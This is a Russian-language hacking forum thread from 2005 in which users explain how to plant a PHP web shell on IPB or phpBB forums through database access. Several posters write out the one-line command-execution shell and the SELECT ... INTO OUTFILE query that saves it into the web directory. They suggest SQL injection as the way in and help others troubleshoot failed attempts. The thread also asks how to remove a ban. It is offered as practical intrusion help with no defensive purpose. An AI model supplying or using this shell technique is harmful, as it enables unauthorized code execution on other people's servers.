PDA

Просмотр полной версии : Заливка шелла и снятие бана в ipb через mysql

darks
24.11.2005, 20:05
Есть доступ к базе ... Возможно ли как нить залить шелл через неё ? И что нужно редактить в этой базе стобы снять бан ? Я тут попытался но у меня что то не особо получилось ... Кстати форум Ipb стоит .
madnet
24.11.2005, 20:30
Сначала заносим в БД запись нашего шела типа
<? system($_GET(cmd)) ?>

Потом сохраняем в файл
SELECT blabla INTO OUTFILE 'shell.php' FROM TABLE_NAME
*Van*
24.11.2005, 21:23
А на phpbb можно таким способом заливать шелл?
m0nzt3r
24.11.2005, 21:39
ну пхпББ тоже на БД работает соответсвтенно можно=)
*Van*
24.11.2005, 21:56
И это будет работатьь на любых версиях?
milord69
24.11.2005, 22:02
Сначала заносим в БД запись нашего шела типа
<? system($_GET(cmd)) ?>

Потом сохраняем в файл
SELECT blabla INTO OUTFILE 'shell.php' FROM TABLE_NAME


Обьясни плиз немного подробнее
m0nzt3r
24.11.2005, 22:09
Обьясни плиз немного подробнее
находишь СКУЛЬ иньекцию..или пробиваешься и достаешь доступ к базе.. и делаешь запрос с помощью которого добавляешь юзера(или еще чего то в базу) с содержанием <? system($_GET['cmd']; ?> а дальше по команде маднета
надеюсь понятно??
Ван, ну наверно))ведь во всех версиях есть коннект к БД =))
milord69
24.11.2005, 22:13
находишь СКУЛЬ иньекцию..или пробиваешься и достаешь доступ к базе..

Доступ есть... Но вот дальше не понял. Если можно, то подробней плиз. :)
Rebz
24.11.2005, 22:37
Подробней - выучи команды SQL.
Insert, select хотя бы. C помощью команды insert добавь юзера.
qBiN
24.11.2005, 23:53
2 ВанПрошу не флудить и по-возможности не задавать однотипные а также глупые вопросы.Так же не писать по одному вопросу в сообщении,если захотел что то добавить(незначительное) то есть кнопочка редактирования сообщения.
Все выше перечисленное относится и к другим пользователям.
Настчет темы добавлю к сообщению madnet'a
SELECT `my_column` INTO OUTFILE '/path2/wwwdir/shell.php' FROM TABLE_NAME
Подчеркнутым- полный путь к файлу.
..::k0rps::..
25.11.2005, 20:38
SELECT `my_column` INTO OUTFILE '/path2/wwwdir/shell.php' FROM TABLE_NAME
Подчеркнутым- полный путь к файлу.



Всё делаю как написано, в итоге пишет вот что:

Access denied for user: 'viperweb_ibrd1@localhost' (Using password: YES)

Что это такое и как с этим бароться=)?
qBiN
25.11.2005, 21:09
Access denied for user: 'viperweb_ibrd1@localhost' (Using password: YES)
Что это такое Те что перевести трудно??
Не пускает под юзером viperweb_obrd1, при использовании пароля.Скорее всего неправильный пароль в скриптах.
и как с этим бароться=)?ВВести правильный пароль =)
..::k0rps::..
25.11.2005, 21:20
Те что перевести трудно??
Не пускает под юзером viperweb_obrd1, при использовании пароля.Скорее всего неправильный пароль в скриптах.
ВВести правильный пароль =)


Я в админке ИПБ 1. 3 , там есть такая функция:

SQL Management >>> mySQL Toolbox>>>RUN QUERY

И когда вбиваю всё что ты сказал, вылазиет эта шняга и каким образом я поменяю пароль, ты мне скажи=)
Как можно кроме как через смайлы и мускул ещё залить шелл через этот движок?
qBiN
25.11.2005, 23:50
Access denied for user: 'viperweb_ibrd1@localhost' (Using password: YES)Я расшифровал что это такое,и в чем ошибка обычно кроется. Или не правильный юзер или пароль.
..::k0rps::..
26.11.2005, 00:03
Я расшифровал что это такое,и в чем ошибка обычно кроется. Или не правильный юзер или пароль.

А насчёт других методов залива знаеш чёнить?
Если да то поделись, я тебя отблагадарю=)